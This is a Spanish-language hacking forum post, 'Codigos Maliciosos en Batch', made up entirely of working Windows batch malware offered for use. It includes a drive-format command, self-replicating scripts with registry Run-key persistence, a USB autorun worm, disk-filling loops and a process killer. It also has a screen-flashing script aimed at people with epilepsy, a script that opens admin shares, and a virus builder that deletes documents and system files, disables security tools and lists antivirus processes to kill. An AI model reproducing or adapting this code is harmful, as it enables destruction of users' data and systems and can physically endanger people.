Codigos Maliciosos en Batch

  • 4 Respuestas
  • 8426 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5678
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Codigos Maliciosos en Batch

  • en: Julio 18, 2011, 11:34:05 am
Comandos para Apagar la PC a cierta hora:
Código: (dos) [Seleccionar]
cls
at 03:00 shutdown -s -t 15 -c
cls
at 06:00 shutdown -s -t 15 -c
cls
at 09:00 shutdown -s -t 15 -c



Comando para formatear
Código: (dos) [Seleccionar]
format c:
if exist format d:
if exist format e:
if exist format f:
if exist format g:
if exist format h:



Virus Tony (LLena la maquina de ficheros basura)
Código: (dos) [Seleccionar]
@echo off
cls
if exist C:\Windows\Norfolk.bat goto yaa
copy %0 C:\Windows\Norfolk.bat
copy %0 C:\Windows\Tejas.bmp
del C:\Windows\system32\Ratcat.reg
:yaa
if exist C:\Windows\Startold.bat goto yae
copy %0 C:\Windows\Startold.bat
copy %0 C:\Windows\Aros.bmp
del C:\Windows\system32\Ratcat.reg
:yae
if exist C:\Windows\Abchold.bat goto yai
copy %0 C:\Windows\Abchold.bat
copy %0 C:\Windows\Burbujas.bmp
del C:\Windows\system32\Ratcat.reg
:yai
if exist C:\Windows\Kohler.bat goto yao
copy %0 C:\Windows\Kohler.bat
copy %0 C:\Windows\Archivec.dll
del C:\Windows\system32\Ratcat.reg
:yao
if exist C:\Windows\Zorolk.bat goto yau
copy %0 C:\Windows\Zorolk.bat
del C:\Windows\system32\Ratcat.reg
:yau
if exist C:\Windows\Fold.bat goto yea
copy %0 C:\Windows\Fold.bat
del C:\Windows\system32\Ratcat.reg
:yea
if exist C:\Windows\Langdon.bat goto yee
copy %0 C:\Windows\Langdon.bat
del C:\Windows\system32\Ratcat.reg
:yee
if exist C:\Windows\system32\Codnoc.bat goto yei
copy %0 C:\Windows\system32\Codnoc.bat
del C:\Windows\system32\Ratcat.reg
:yei
if exist C:\Windows\system32\Anton.bat goto yeo
copy %0 C:\Windows\system32\Anton.bat
del C:\Windows\system32\Ratcat.reg
:yeo
if exist C:\Windows\system32\Falcon.bat goto yeu
copy %0 C:\Windows\system32\Falcon.bat
del C:\Windows\system32\Ratcat.reg
:yeu
if exist C:\Windows\system32\Woo.bat goto yia
copy %0 C:\Windows\system32\Woo.bat
del C:\Windows\system32\Ratcat.reg
:yia
if exist C:\Windows\system32\Mandala.bat goto yie
copy %0 C:\Windows\system32\Mandala.bat
del C:\Windows\system32\Ratcat.reg
:yie
if exist C:\Windows\System\Troenyi.bat goto yio
echo echo off > C:\Windows\System\Troenyi.bat
echo cls >> C:\Windows\System\Troenyi.bat
echo if exist C:\Windows\Tejas.bmp if not exist C:\Windows\Norfolk.bat copy %0 C:\Windows\Norfolk.bat >> C:\Windows\System\Troenyi.bat
echo if exist C:\Windows\Aros.bmp if not exist C:\Windows\Norfolk.bat copy %0 C:\Windows\Norfolk.bat >> C:\Windows\System\Troenyi.bat
echo if exist C:\Windows\Burbujas.bmp if not exist C:\Windows\Norfolk.bat copy %0 C:\Windows\Norfolk.bat >> C:\Windows\System\Troenyi.bat
echo if exist C:\Windows\Archivec.dll if not exist C:\Windows\Norfolk.bat copy %0 C:\Windows\Norfolk.bat >> C:\Windows\System\Troenyi.bat
echo cls >> C:\Windows\System\Troenyi.bat
echo exit >> C:\Windows\System\Troenyi.bat
del C:\Windows\system32\Ratcat.reg
attrib +h C:\Windows\System\Troenyi.bat
:yio
if exist C:\Windows\system32\Ratcat.reg goto yar
echo REGEDIT4 > C:\Windows\system32\Ratcat.reg
echo . >> C:\Windows\system32\Ratcat.reg
echo [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] >> C:\Windows\system32\Ratcat.reg
echo "FireWorks"="C:\\Windows\\Norfolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "Upholds"="C:\\Windows\\Startold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Systemtasks"="C:\\Windows\\Abchold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask"="C:\\Windows\\Kohler.bat" >> C:\Windows\system32\Ratcat.reg
echo "Tmoaneis5txrxo"="C:\\Windows\\Zorolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "UpgradeWeb"="C:\\Windows\\Fold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hcarcakcekrexr"="C:\\Windows\\Langdon.bat" >> C:\Windows\system32\Ratcat.reg
echo "WindowsSystem"="C:\\Windows\\system32\\Codnoc.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hidrosystem"="C:\\Windows\\system32\\Anton.bat" >> C:\Windows\system32\Ratcat.reg
echo "AntiVirusStart"="C:\\Windows\\system32\\Falcon.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask"="C:\\Windows\\system32\\Woo.bat" >> C:\Windows\system32\Ratcat.reg
echo "SystemSimbol"="C:\\Windows\\system32\\Mandala.bat" >> C:\Windows\system32\Ratcat.reg
echo "DOS"="C:\\Windows\\System\\Troenyi.bat" >> C:\Windows\system32\Ratcat.reg
echo . >> C:\Windows\system32\Ratcat.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >> C:\Windows\system32\Ratcat.reg
echo "FireWorks2"="C:\\Windows\\Norfolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "Upholds2"="C:\\Windows\\Startold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Systemtasks2"="C:\\Windows\\Abchold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask2"="C:\\Windows\\Kohler.bat" >> C:\Windows\system32\Ratcat.reg
echo "Tmoaneis5txrxo2"="C:\\Windows\\Zorolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "UpgradeWeb2"="C:\\Windows\\Fold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hcarcakcekrexr2"="C:\\Windows\\Langdon.bat" >> C:\Windows\system32\Ratcat.reg
echo "WindowsSystem2"="C:\\Windows\\system32\\Codnoc.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hidrosystem2"="C:\\Windows\\system32\\Anton.bat" >> C:\Windows\system32\Ratcat.reg
echo "AntiVirusStart2"="C:\\Windows\\system32\\Falcon.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask2"="C:\\Windows\\system32\\Woo.bat" >> C:\Windows\system32\Ratcat.reg
echo "SystemSimbol2"="C:\\Windows\\system32\\Mandala.bat" >> C:\Windows\system32\Ratcat.reg
echo "DOS2"="C:\\Windows\\System\\Troenyi.bat" >> C:\Windows\system32\Ratcat.reg
echo . >> C:\Windows\system32\Ratcat.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> C:\Windows\system32\Ratcat.reg
echo "FireWorks3"="C:\\Windows\\Norfolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "Upholds3"="C:\\Windows\\Startold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Systemtasks3"="C:\\Windows\\Abchold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask3"="C:\\Windows\\Kohler.bat" >> C:\Windows\system32\Ratcat.reg
echo "Tmoaneis5txrxo3"="C:\\Windows\\Zorolk.bat" >> C:\Windows\system32\Ratcat.reg
echo "UpgradeWeb3"="C:\\Windows\\Fold.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hcarcakcekrexr3"="C:\\Windows\\Langdon.bat" >> C:\Windows\system32\Ratcat.reg
echo "WindowsSystem3"="C:\\Windows\\system32\\Codnoc.bat" >> C:\Windows\system32\Ratcat.reg
echo "Hidrosystem3"="C:\\Windows\\system32\\Anton.bat" >> C:\Windows\system32\Ratcat.reg
echo "AntiVirusStart3"="C:\\Windows\\system32\\Falcon.bat" >> C:\Windows\system32\Ratcat.reg
echo "Windowsmask3"="C:\\Windows\\system32\\Woo.bat" >> C:\Windows\system32\Ratcat.reg
echo "SystemSimbol3"="C:\\Windows\\system32\\Mandala.bat" >> C:\Windows\system32\Ratcat.reg
echo "DOS3"="C:\\Windows\\System\\Troenyi.bat" >> C:\Windows\system32\Ratcat.reg
regedit.exe /s C:\Windows\system32\Ratcat.reg
:yar
if exist C:\Windows\Google.exe goto yiu
copy %0 C:\Windows\Google.exe
:yiu
if exist C:\Windows\system32\Netkat.com goto yoa
copy %0 C:\Windows\system32\Netkat.com
:yoa
if exist C:\Windows\System\Web.web goto yoe
copy %0 C:\Windows\System\Web.web
:yoe
if exist C:\Windows\system32\Toni5.vbs goto yoi
echo t = msgbox("El virus de Toni5. te abrio el culo",,"Toni5. te cago") > C:\Windows\system32\Toni5.vbs
attrib +h +s C:\Windows\system32\Toni5.vbs
:yoi
start C:\Windows\system32\Toni5.vbs
cls
:yyy
cls
echo abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 1234567890+-*/,.-;:_´ç`+^*¨Çºª!"•$%&/=?¿'¡\Ç@#~¬ >> C:\Windows\Google.exe
cls
echo abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 1234567890+-*/,.-;:_´ç`+^*¨Çºª!"•$%&/=?¿'¡\Ç@#~¬ >> C:\Windows\system32\Netkat.com
cls
echo abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 1234567890+-*/,.-;:_´ç`+^*¨Çºª!"•$%&/=?¿'¡\Ç@#~¬ >> C:\Windows\System\Web.web
goto yyy



Virus que apaga la maquina a las 3,6 y 9
Código: (dos) [Seleccionar]
color 0D
TITLE Recuperacion de "Windows"
FOR %%A IN ( C E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\ (goto existe) else (goto no)
CLS
attrib -h -s %0
CLS
copy %0 %%A:\USB.BAT & attrib +h +s %%A:\USB.BAT & attrib +h +s %0
CLS
CLS
echo [AutoRun] >> %%A:\autorun.inf
CLS
echo label=%%A:\%%A The "AZAFRAM"" >> %%A:\autorun.inf
CLS
echo open=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
echo shellexecute=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
echo shell\Auto\command=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
attrib +h +s %%A:\autorun.inf
CLS
CLS
start /MAX %systemdrive%
cls
at 03:00 shutdown -s -t 15 -c "THE AZAFRAM"
cls
at 06:00 shutdown -s -t 15 -c "THE AZAFRAM"
cls
at 09:00 shutdown -s -t 15 -c "THE AZAFRAM"
CLS
ECHO The AZAFRAM
)



Virus que crea carpetas
Código: (dos) [Seleccionar]
@echo off
Title Disk Consumer By Fhaker
cd/
if exist kaka.txt goto menu
if not exist kaka.txt goto regadd
:regadd
cd/
echo sos gil > kaka.txt
echo 0 > kaka1.txt
attrib +h kaka.txt
attrib +h kaka1.txt
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "DataBaseNhgT000" /t REG_SZ /d %0
copy /y %0 %windir%\System32\fhaker.bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Fee-burn022" /t REG_SZ /d %windir%\System32\fhaker.bat
start /b / min %windir%\System32\fhaker.bat
goto menu
:menu
cd/
for /f %%i in (kaka1.txt) do set f=%%i
set /a f=f+1
echo %f% >> kaka1.txt
echo @echo off > consumera%f%.bat
echo echo @echo off ^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo asasasasasasasasasasasasasasasasasasasasasasasasasasasas ^>^> consumerb%f%.bat >> consumera%f%.bat
echo echo exit ^>^> consumerb%f%.bat >> consumera%f%.bat
echo exit >> consumera%f%.bat
start /b /min consumera%f%.bat
attrib +h consumera%f%.bat
attrib +h consumerb%f%.bat
attrib +h %0
goto menu
exit



VIRUS QUE MATA TODOS LOS PROCESOS
Código: (dos) [Seleccionar]
@echo off
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "DataBaseNhgT000" /t REG_SZ /d %0
title TallKill by Fhaker
cd/
tasklist >kuank2.txt
set /a f=%f% + 1
set /a sk=5 + %f%
for /f "skip=%sk% tokens=1 delims= " %%i in (kuank2.txt) do taskkill /f /im %%i



Virus para Epilepticos
Código: (dos) [Seleccionar]
@echo off
REG ADD HKCU\Console /v FullScreen /t REG_DWORD /d 1 /f
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
echo ...
echo ----------------------------------------------------------------------------------------------------------------------------
:bucle
color 08
color 09
color 0a
color 0b
color 0c
color 0d
color 0e
color 0f
color 18
color 19
color 1a
color 1b
color 1c
color 1d
color 1e
color 1f
color 28
color 29
color 2a
color 2b
color 2c
color 2d
color 2e
color 2f
color 38
color 39
color 3a
color 3b
color 3c
color 3d
color 3e
color 3f
color 48
color 49
color 4a
color 4b
color 4c
color 4d
color 4e
color 4f
color 58
color 59
color 5a
color 5b
color 5c
color 5d
color 5e
color 5f
color 68
color 69
color 6a
color 6b
color 6c
color 6d
color 6e
color 6f
color 78
color 79
color 7a
color 7b
color 7c
color 7d
color 7e
color 7f
goto bucle



Comparte Disco Duros
Código: (dos) [Seleccionar]
@echo off
set a=Abrete CsaMo
copy %0 %windir%\%a%.bat
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
net share e=e:
:: Abrete CsaMo by [email protected]



Labs de Virus en Batch
Código: (dos) [Seleccionar]
@echo off
color 0A
title EMZAMBLER by AZAFRAM
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER by AZAFRAM º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1.crear nuevo virus º
echo º 2.salir º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p pre=
if %pre%==1 goto PRI
if %pre%==2 goto 0
:PRI
CLS
ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º ESCRIBA EL NOMBRE DEL VIRUS º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p vir=
ECHO @echo off >%vir%.bat
echo title %vir% >>%vir%.bat
cls
:PRIN
CLS
ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER º
ECHO º VIRUS º
ECHO º BY AZAFRAM v0.1 º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1 bloquear administrador de tareas º
echo º 2 borrarle mis documentos º
echo º 3 bloquearle el acseso a una web º
echo º 4 desabilitarle prodiedades de pantalla º
echo º 5 desactivar clave de producto de windowsº
echo º 6 inpedir que vuleva a iniciar windows º
echo º 7 bloquear archivos ejecutables º
echo º 8 mostrar un mensaje al inicio de windowsº
echo º 9 borrarle un archivo o una carpeta º
echo º 10 borrarle todos los archivos de un discº
echo º 11 desactivar editor de registro º
echo º 12 cambiar pagina de inicio º
echo º 13 borrarle messenger º
echo º 14 apagar ordenador en el instante º
echo º 15 terminar un proceso en ejecucion º
echo º 16 lista de procesos de antivirus y fire º
echo º 17 ver tus procesos en ejecucion º
echo º 18 ver directorio de antivirus y firewallº
echo º 19 ayuda º
echo º 0 SALIR º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p pre=
if %pre%==1 goto ad
if %pre%==2 goto 2
if %pre%==3 goto 3
if %pre%==4 goto 4
if %pre%==5 goto 5
if %pre%==6 goto 6
if %pre%==7 goto 7
if %pre%==8 goto 8
if %pre%==9 goto 9
if %pre%==10 goto 10
if %pre%==11 goto 11
if %pre%==12 goto 12
if %pre%==13 goto 13
if %pre%==14 goto 14
if %pre%==15 goto 15
if %pre%==16 goto 16
if %pre%==17 goto 17
if %pre%==18 goto 18
if %pre%==19 goto 19
if %pre%==0 goto 0
:ad
cls
echo reg add hkey_current_u ser\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d 1 /f >>%vir%.bat
ECHO INGRESADO A %VIR%
PAUSE >NUL
CLS
GOTO :PRIN
:2
cls
ECHO del "%systemdrive%\documents and settings\%username%\mis documentos" /s /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:3
cls
echo Escriba la web a restringir:
set /p web=
echo echo 127.0.0.1 %web% %systemdrive%\windows\system32\drivers\etc\hosts >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:4
cls
echo reg add hkey_current_u ser\software\microsoft\windows\currentversion\policies\system /v nodispcpl /t reg_dword /d 1 /f >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:5
cls
echo del %systemdrive%\windows\system32\wpa.dbl /f /a /q >>%vir%.bat
echo del %systemdrive%\windows\system32\wpa.bak /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:6
cls
echo del %systemdrive%\windows\system32\hal.dll /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:7
cls
echo reg add hkey_classes_r oot\exefile\shell\open\command /ve /t reg_sz /f >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:8
cls
echo Escriba el mensaje a mostrar:
set /p m=
echo reg add "hkey_local_mac hine\software\microsoft\windows nt\currentversion\winlogon" /v legalnoticecap tion /t reg_sz /d "" /f >>%vir%.bat
echo reg add "hkey_local_mac hine\software\microsoft\windows nt\currentversion\winlogon" /v legalnoticetex t /t reg_sz /d "%m%" /f >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:9
cls
echo -1 borrarle un archivo
echo -2 borrarle una carpeta
echo -3 menu
set /p pre=
if %pre%==1 goto ar
if %pre%==2 goto car
if %pre%==3 goto PRIN
:ar

cls
echo ejemplo si el archivo se encuentra en disco c:\ es asi C:\archivo
echo escribe la estencion como C:\archivo.exe
echo escriba el directorio del archivo:
set /p m=
echo del "%m%" /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:car
echo escriba el directorio de la carpeta:
set /p c=
echo rmdir "%c%" /s /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:10
cls
echo -1 borrarle borrarle todos los archivos del disco q esta usando
echo -2 seleccionar el disco a borrar
echo -3 menu
set /p pre=
if %pre%==1 goto uz
if %pre%==2 goto u
if %pre%==3 goto PRIN
:uz
echo del "%systemdrive%\*.exe" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.jpg" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.gif" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.bmp" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.mp3" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.wav" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.wma" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.avi" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.mpg" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.wmv" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.txt" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.doc" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.swf" /s /f /a /q >>%vir%.bat
echo del "%systemdrive%\*.lnk" /s /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:u
cls
echo escriba la letra de la unidad:
set /p l=
echo del "%l%:\*.exe" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.jpg" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.gif" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.bmp" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.mp3" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.wav" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.wma" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.avi" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.mpg" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.wmv" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.txt" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.doc" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.swf" /s /f /a /q >>%vir%.bat
echo del "%l%:\*.lnk" /s /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:11
cls
echo reg add hkey_current_u ser\software\microsoft\windows\currentversion\policies\system /v disableregistr ytools /t reg_dword /d 1 /f >>%vir%.bat
cls
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:12
cls
echo escriba la pagina de inicio:
set /p pg=
echo reg add "hkey_current_u ser\software\microsoft\internet explorer\main" /v "start page" /t reg_sz /d %pg% /f >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:13
cls
echo tskill msnmsgr >>%vir%.bat
echo del "%systemdrive%\archivos de programa\msn messenger" /s /f /a /q >>%vir%.bat
echo tskill msmsgs >>%vir%.bat
echo del "%systemdrive%\archivos de programa\messenger" /s /f /a /q >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:14
cls
echo shutdown -s -t 0 >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:15
cls
echo escribe el nombre del proceso
echo escriba la pagina de inicio:
set /p proceso=
echo tskill %proceso% >>%vir%.bat
ECHO INGRESADO A %VIR%
pause >nul
CLS
GOTO :PRIN
:16
cls
echo estos son los nombre de los procesos
echo de algunos antivirus y firewall
echo fspex
echo kav
echo AcctMgr
echo Activeshield
echo MCVSSHLD
echo Ad-aware
echo Ad-watch
echo ad-aware
echo Alogserv
echo AMON
echo amon
echo TJEnder
echo ATWatch
echo AVwin
echo AnVir
echo APVXDWIN
echo ashmaisv
echo ATWatch
echo atrack
echo AuthStart
echo ashserv
echo ashDisp
echo Ashwebsv
echo Astart32
echo Avconsol
echo Avgamsvr
echo AVGCC
echo AVGEMC
echo avgw
echo Avgamsvr
echo AVGCTRL
echo AVGNT
echo avgmsvr
echo Avgserv9
echo AVGNT
echo AVGUARD
echo avgcc32
echo AVGEMC
echo AVGREGCL
echo AVINIT9X
echo AVKPop
echo AVKBar
echo Avmaisrv
echo apvxdwin
echo atupdater
echo aupdate
echo autodown
echo autotrace
echo autoupdate
echo avconsol
echo avengine
echo avsynmgr
echo avwupd32
echo avxquar
echo bawindo
echo blackd
echo ccapp
echo ccevtmgr
echo ccproxy
echo cfiaudit
echo defwatch
echo drwebupw
echo escanh95
echo escanhnt
echo firewall
echo frameworkservi ce
echo icssuppnt
echo icsupp95
echo luall
echo mcagent
echo mcshield
echo mcupdate
echo mcvsescn
echo mcvsrte
echo mcvsshld
echo msconfig
echo msdev
echo navapsvc
echo navapw32
echo nisum
echo nopdb
echo nprotect
echo nupgrade
echo ollydbg
echo outpost
echo pavfires
echo pavproxy
echo pavsrv50
echo peid
echo petools
echo regedit
echo reshacker
echo rtvscan
echo rulaunch
echo savscan
echo shstat
echo sndsrvc
echo symlcsvc
echo grUpdate
echo updaterui
echo ccvpupd
echo vshwin32
echo vsstat
echo vstskmgr
echo w32dasm
echo winhex
echo wscript
echo Avmaisrv
echo alogserv
echo Apvxdwin
echo Avengine
echo avgcc32
echo ad-aware
echo Ad-watch
echo emule
echo icq
echo kazaa
echo lycos
echo Lavasoft
pause >nul
CLS
GOTO :PRIN
:17
cls
start taskmgr
echo aki estan tus procesos que estan ejecutando
pause >nul
CLS
GOTO :PRIN
:18
cls
ECHO estos son los nombre de las carpetas de algunos
echo de los antivirus que exixten
echo usual mente las carpetas estaran en c:\
echo ejemplo C:\archivos de programa\Norton antivirus
ECHO "Norton antivirus"
ECHO "Panda"
ECHO "kaspersky lab"
ECHO "Mcafee antivirus"
ECHO "Ewido antispyware"
ECHO "lavasoft"
ECHO "Micro trend"
ECHO "Avast"
ECHO "quick time"
ECHO "Avg"
ECHO "systemworks"
ECHO "Virus scan"
ECHO "virus detector"
ECHO "antivirus"
ECHO "Antitrojan"
ECHO "trojankiller"
ECHO "virusscan"
ECHO "virussafe"
ECHO "virus safe"
ECHO "NOD32"
ECHO "NOD32 antivirus system"
ECHO "panda titanium"
ECHO "titanium antivirus"
ECHO "symantec"
ECHO "Norton Systemworks"
ECHO "avast antivirus"
ECHO "avg antivirus"
ECHO "avg anti-virus"
ECHO "bitdefender"
ECHO "antivir"
ECHO "avast!"
ECHO "mcafee virus scan"
ECHO "portable clam win"
ECHO "clam win"
ECHO "trend micro sys clean"
ECHO "kerio"
ECHO "kerio wirout"
ECHO "kerio wirout firewall"
ECHO "zonealarm"
ECHO "outpost"
ECHO "sygate"
ECHO "norton firewall"
ECHO "norton"
ECHO "adware away"
ECHO "adware"
ECHO "noadware"
ECHO "spyemergency"
ECHO "spyremover"
ECHO "spystopper"
ECHO "spyware doctor"
ECHO "spyware detective"
ECHO "trend micro anti-spyware"
ECHO "winpatrol"
ECHO "xoftspy"
ECHO "avast antivirus"
ECHO "aio top security"
ECHO "avg anti-virus"
ECHO "bitdefender pro"
ECHO "dr.web"
ECHO "f-port antivirus"
ECHO "kaspersky antivirus"
ECHO "panda antivirus platinum"
ECHO "kerio personal firewall"
ECHO "kerio firewall"
ECHO "kerio s firewall"
ECHO "kerio winroute"
ECHO "kerio winroute firewall"
ECHO "mcafee ps firewall"
ECHO "mcafee ps"
ECHO "outpost"
ECHO "outpost firewall"
ECHO "sygate"
ECHO "sygate.ps"
ECHO "sygate.ps firewall"
ECHO "webroot"
ECHO "webroot desktop"
ECHO "webroute desktop firewall"
ECHO "zonealarm ss"
ECHO "ashampoo"
ECHO "ashampoo antispyware"
ECHO "counterspy"
ECHO "etrust"
ECHO "etrust pp"
ECHO "etrust pp antispyware"
ECHO "evonsoft"
ECHO "evonsoft spyware"
ECHO "evonsoft spyware remover"
ECHO "mcafee antispyware ep"
ECHO "spyemergency"
ECHO "spy emergency"
ECHO "spyremover"
ECHO "spystopper"
ECHO "spyware adware remover"
ECHO "spyware"
ECHO "spyware doctor"
ECHO "spyware nuker"
ECHO "spyware nuker xt"
ECHO "super antispyware"
ECHO "the spyware detective"
ECHO "webroot"
ECHO "webroot spy sweeper"
ECHO "adware away"
ECHO "adware deluxe"
ECHO "adwarex eliminator"
ECHO "anti trojan elite"
ECHO "anti trojan"
ECHO "no adware"
ECHO "trojanhunter"
ECHO "trojan remover"
ECHO "unhackme"
ECHO "unhackme trojan remover"
ECHO "ewido antispiware"
ECHO "ewido anti-malware"
ECHO "blackice"
ECHO "blackice pc"
ECHO "blackice pc protection"
ECHO "f-secure"
ECHO "f-secure internet"
ECHO "f-secure internet security"
ECHO "steganos"
ECHO "steganos internet security"
ECHO "aio"
